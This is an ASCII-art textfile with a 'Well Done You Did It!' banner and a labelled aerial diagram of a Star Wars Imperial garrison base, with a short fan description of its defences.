      |______||______||______||______||______||______||______||______||______|
      __          __  _ _   _____
              \ \        / / | | | |  __ \
               \ \  /\  / /__| | | | |  | | ___  _ __   ___
                \ \/  \/ / _ \ | | | |  | |/ _ \| '_ \ / _ \
                 \  /\  /  __/ | | | |__| | (_) | | | |  __/
              __  \/ _\/ \___|_|_|_|_____/ \___/|_|_|_|\___| _
              \ \   / /          |  __ \(_)   | | |_   _| | | |
               \ \_/ /__  _   _  | |  | |_  __| |   | | | |_| |
                \   / _ \| | | | | |  | | |/ _` |   | | | __| |
                 | | (_) | |_| | | |__| | | (_| |  _| |_| |_|_|
                 |_|\___/ \__,_| |_____/|_|\__,_| |_____|\__(_)
     
     _____ _ _ _ __ __ __  _ ___ _   __  ___  __ __  __  _  ___ _ _  __ _________
     %=x%= | |V| |_)|_ |_) | |_| |   |_) |_| (_  |_  |_) |  |_| |\| (_  %=x%=x%=x
     ~~~~~ | | | |  |_ | \ | | | |_  |_) | | __) |_  |   |_ | | | | __) ~~~~~~~~~
     LS
                      .-. .-.
                    .=========.         E x t e r i o r ,   A e r i a l   V i e w
                    ||.-.7.-.||         -----------------------------------------
                    ||`-' `-'||
                    `========='
                     `-'| |`-'8               1 .............. Sensor Suite Tower
               ______   |9|   ______          2 ... Heavy Twin Turbolaser Turrets
              /     /\__| |__/\     \         3 ............. Heavy Laser Turrets
             /  \_ / /  |_|  \ \ _/  \        4 ....... TIE Fighter Launch Chutes
            /___(\\\/         \///)___\       5 ............... Heavy Blast Doors
            \____\\`==========='//____/       6 .................... Guard towers
            /     '/ .-------. \\     \       7 ........ Shuttle Landing Platform
         __/     //. \`+---+'/ .\\     \__    8 ........... AT-AT Docking Station
        /\ \    ///x`.\|___|/.'x\\\    / /\   9 ................. Connecting Ramp
       /  \ \  //`-._//|   |\\_.2'\\  / /  \
      /  _.-==='_____//.-=-.\\_____`===-._  \
      \   `-===.\-.  \ `-=1' /  .-/.===-' 3 / The pre-fabricated,  multi-function
       \  / /  \\\ \  \.===./  /4///  \ \  /  Imperial garrison base is the back-
        \/_/    \\\ | /.---.\ | ///    \_\/   bone of the  Empire's  occupational
           \     \\\|/ |_m_| \|///     /      forces. These heavily-armoured for-
            \_____\=============/_____/       tresses have  walls up to 10 meters
            /____///    ___    \\\____\       thick  to  guard   against   ground
            \   (_//\__|||||__/\\_)   /       assaults,  and  powerful  deflector
             \  /  \|,,|||||,,|/  \  /        shields  protect  them  for  air or
              \_____|  | 5 | 6|_____/         space attacks.
    

    That completes the box.
